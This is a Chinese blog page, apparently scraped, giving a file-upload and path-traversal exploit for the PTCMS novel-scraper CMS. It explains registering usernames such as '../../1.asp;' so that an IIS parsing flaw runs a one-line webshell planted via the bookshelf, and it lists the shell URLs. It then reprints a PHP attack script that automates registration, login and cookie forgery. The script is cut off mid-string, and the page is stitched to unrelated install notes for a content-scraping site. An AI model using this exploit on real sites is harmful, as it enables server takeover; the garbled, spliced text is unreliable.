好用的小说小偷程序php,ptcms小说小偷程序最新漏洞

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

http://localhost/1.asp;/mark.ptv

http://localhost/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

//error_reporting(0);

print_r(''

+---------------------------------------------------------------------------+

PTcms Code written Exploit

by:cfking@90sec.org

welcome to [url]www.90sec.org[/url]

+---------------------------------------------------------------------------+

''

);

if($argv[1]==null){

print_r(''

Usage: php ''.$argv[0].'' url

Example:

php ''.$argv[0].''

[url]www.site.com[/url]

'');

   exit;

}

$url=$argv[1];

$user=substr(md5(time()),0,10).".asp";

$settime=date("Y-m-d",time());

$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=��һ��");

if($to!==null){

postzend($url,"comeurl=http://www.cscity.net/user/index.php&username=$to&password=hacker&cookietime=31536000&dosubmit=��+��",''login'',''/user/logchk.php'');

$cookie="logtime=$settime; logip=110.110.110.110;

pt_userlv=����; pt_userpmnum=0; pt_username=$to";

postzend($url,''1=

分享:

a4c26d1e5885305701be709a3d33442f.png喜欢

0

a4c26d1e5885305701be709a3d33442f.png赠金笔

加载中,请稍候......

评论加载中,请稍候...

发评论

登录名: 密码: 找回密码 注册记住登录状态

昵   称:

发评论

以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

看书啦小说小偷程序程序短小精悍,要一点点空间即可支持运行。运行环境:ASP 1M以内空间即可。 使用方法: 1、上传目录内所有文件到你的站点 2、用记事本打开conn.asp文件,进行设置    ①site_title = "某某小说网"       修改引号内的内容为你的站点名称,如:逆火小说网    ②site_url = "localhost:8080"     修改引号内的内容为你的站点域名,如:www.nihuo.net,注:前面不能含有HTTP://,后面不能含有斜杠“/”    ③site_Path = "/"     修改引号内的内容为小偷程序所在目录,如小偷在根目录设置为 / ,如小偷在根目录的 xiaoshou 文件夹内,就设置为 /xiaoshuo/ ,目录名前、后都要有 / ,如果在根目录,只要设置为 / 就可以了    ④site_miibeian = "日ICP备XXXXX号"  修改引号内的内容为你域名的备案号,如:京ICP备xxxxxx号    ⑤site_BBS = "http://www.XXX.com/bbs" 修改引号内的内容为你的论坛或留言本地址,使用绝对地址格式为:http://bbs.nihuo.net,如论坛或留言本在小偷程序所在目录的“bbs”文件夹内,可以使用相对地址,如: site_BBS = site_Path&"bbs"    ⑥M_title = "看书啦小说网|看书啦"   修改引号内的内容为目标站名称,如: 起点小说网,多个名称请用|符号进行分隔,如:起点小说网|起点文学网 ,通常情况下不需要修改    ⑦M_url = "http://www.kanshu.la"    修改引号内的内容为目标站网址,如:http://www.nihuo.net,后面不要加/ ,通常情况下不需要修改    ⑧M_img = "http://img.kanshu.la:88/" 修改引号内的内容为目标站图片服务器地址,如:ttp://images.nihuo.net/ ,后面必需有/ ,通常情况下不需要修改 3、修改网站图标,在images文件夹内,logo.gif与yd_logo.gif两个文件,前者是网站全局图标,后者是阅读页图标,可以用photoshop或Fireworks编辑为你自己的图标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值